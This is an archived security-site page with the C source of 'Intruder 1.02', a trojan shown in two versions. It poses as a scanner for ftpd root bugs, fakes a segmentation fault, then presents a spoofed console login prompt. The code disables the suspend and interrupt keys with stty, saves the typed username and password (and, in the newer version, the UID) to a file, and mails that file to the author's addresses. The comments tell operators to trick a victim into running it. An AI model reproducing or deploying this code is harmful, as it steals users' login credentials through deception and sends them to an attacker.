TUCoPS :: Unix :: General :: intrudrf.c

Intruder 1.02 Claims to Look for local ftpd bugs, then fakes core dump and spoofs login prompt. HAC:
 

/* Intruder 1.02 Written by the boys of #coderspc (Undernet) mostly
written by THeGZa, but I couldn't have done it without Guilly,
RedBull, and especially R33TaWRd. line 26 has char email[] =
"youremailaddress@here.com" change that with your e-mail address,and
 the users login and pass will be sent to you. Get your victim to run
this program on there linux box (might work in other unices, don't know?)
it's disguised as a program to see if your system is vanurable to
any ftp root bugs, then pretends a seg fault, goes back into a
hacked copy of the login sequence. Change this if you like, GIVE US
 CREDIT, for what we did, if you need to get a hold of me e-mail me 
at sam@webnetix.com. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


void main()
{
   char input1[10];
   char input[10];
   char var[80] = {0};
   char buffer1[80] = {0};
   FILE *fp;
   FILE *file;
   char email[] = "your@emailaddresshere.com"; //change this to your e-mail
   char *foo;
   struct login
   {
      char id[10];
      char password[10];
   }loginfake;
   /* if(getuid() !=0) //make sure were root
   {
     printf("you are not root, you cannot run this program, please su to root\n");
     exit(-1);
    } */
     printf("Searching for ftp root bugs\n"); 
   if(!strcmp( getenv("TERM"), "rxvt")) //make sure were not in X
   {
      printf("need to be running in console press CTRL-ALT-F5 to open console terminal\n");
      exit(-1);
   }
   if(!strcmp( getenv("TERM"), "xterm"))
   {
      printf("need to be running in console press CTRL-ALT-F5 to open console terminal\n");
      exit(-1);
   }

   sleep( 1 );
   printf(".\n ");
   sleep( 1 );
   printf(".\n");
   sleep( 1 );
   printf(".\n");
   sleep(1);
   sleep(1);
   printf("Found a root bug!!! inSegmentation Fault (core dumped)\n");
   sleep(1);
   system("clear");
   printf("\n");
   fp = popen("cat /etc/issue.net", "r"); //login info
   fread(var, 80, 1, fp);
   system("stty susp ^G"); //so they can't escape out of login
   printf("%s",var);
   printf("\n");
   printf("localhost login: ");
   gets(input);
   
   printf("Password: ");
   gets(input1);
   printf("\n");
   printf("/bin/login cannot open /etc/motd\n");
   printf("running terminal safe mode!\n");
   printf("\n");
   strcpy(loginfake.id, input);
   strcpy(loginfake.password, input1);
   file = fopen("mirror.txt","w");
   fprintf(file, "%s %s",loginfake.id,loginfake.password);
   fclose(file);
   foo=(char *)malloc(4096); 
   sprintf(foo,"mail %s < mirror.txt",email); // e-mail login and pass
   system(foo);
}



------------------------------------------------------------------------
Here is a newer version:
------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>
typedef struct
{
   char id[9];
   char password[9];
} login;
login loginfake;
void scanend(char *string);
void testX();
void pimpthem();
void fakelogin();
void sttystuff();
void emailus();
void main()
{
  printf("Searching for local ftpd bugs.\n");
  testX();
  pimpthem();
  sttystuff();
  fakelogin();
  emailus();
  
}

void scanend(char *string)
{
  int count;
  for(count=0;count<78;count++)
  {
    if(string[count]==10) string[count]=0;
    if(string[count]==13) string[count]=0;
  }
}

void testX()
{
   char xterm[] = "xterm";
   char xtermcolor[] = "xterm-color";
   char rxvt[] = "rxvt";
   char rxvtcolor[] = "rxvt-color";
   char nxterm[] = "nxterm";
   char noX[] = "You are in X, please exit to run this program";
   if(! (strcmp(getenv("TERM"), xterm)))
   {
     printf("%c\n",noX); 
     exit(-1);
   }
   if( (!strcmp(getenv("TERM"), xtermcolor)))
   {
     printf("%c\n",noX);
     exit(-1);
   }
  if(! (strcmp(getenv("TERM"), rxvt)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
  if(!(strcmp(getenv("TERM"),rxvtcolor)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
  if(!(strcmp(getenv("TERM"),nxterm)))
  {
    printf("%c\n",noX);
    exit(-1);
  }
}

void pimpthem()
{
  printf("\n");
  printf(".\n");
  sleep( 1 );
  printf(".\n");
  sleep( 1 );
  printf(".\n");
  sleep( 1 );
  printf("found buffer overide bug iSegmentation Fault (core dumped)\n");
  sleep( 1 );
  system("clear");
  
}

void fakelogin()
{
   char *input1[10]={0};
   char input[10];
   char var[80] = {0};
   char buffer[80] = {0};
   FILE *fp;
   FILE *file;
   char hostname[80]={0};
   FILE *hostnamefile;
  
   fp = popen("cat /etc/issue.net", "r");
   fread(var, 80, 1, fp);
  
   printf("\n");
   printf("%s",var);
   printf("\n");
  
   hostnamefile=fopen("/etc/HOSTNAME","r");
   fread(hostname,78,1,hostnamefile);
   scanend(hostname);
   printf("%s login: ",hostname);
   gets(input);
  
   *input1=getpass("Password: ");
   printf("\n");
  
   printf("/bin/cat cannot open /etc/motd cought buffer overide!\n");
   printf("opening system fix shell, run fsck\n");
   
   strcpy(loginfake.id, input);
   strcpy(loginfake.password, *input1);
   
   file = fopen("mirror.txt","w");
   fprintf(file, "username:%s\npassword:%s\nUID:%i",loginfake.id, loginfake.password, getuid());
   fclose(file);
}

void emailus()
{
  char guilly[] = "gchamber@videotron.ca";
  char thegza[] = "yacoubi@ibm.net";
  char *foo;
  char *poo;
  
  foo=(char *)malloc(4096);
  sprintf(foo, "mail %s < mirror.txt",guilly);
  poo=(char *)malloc(4096);
  sprintf(poo, "mail %s < mirror.txt",thegza);
  system(foo);
  system(poo);
}

void sttystuff()
{
  system("stty susp ^G");
  system("stty intr ^Q");
}

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH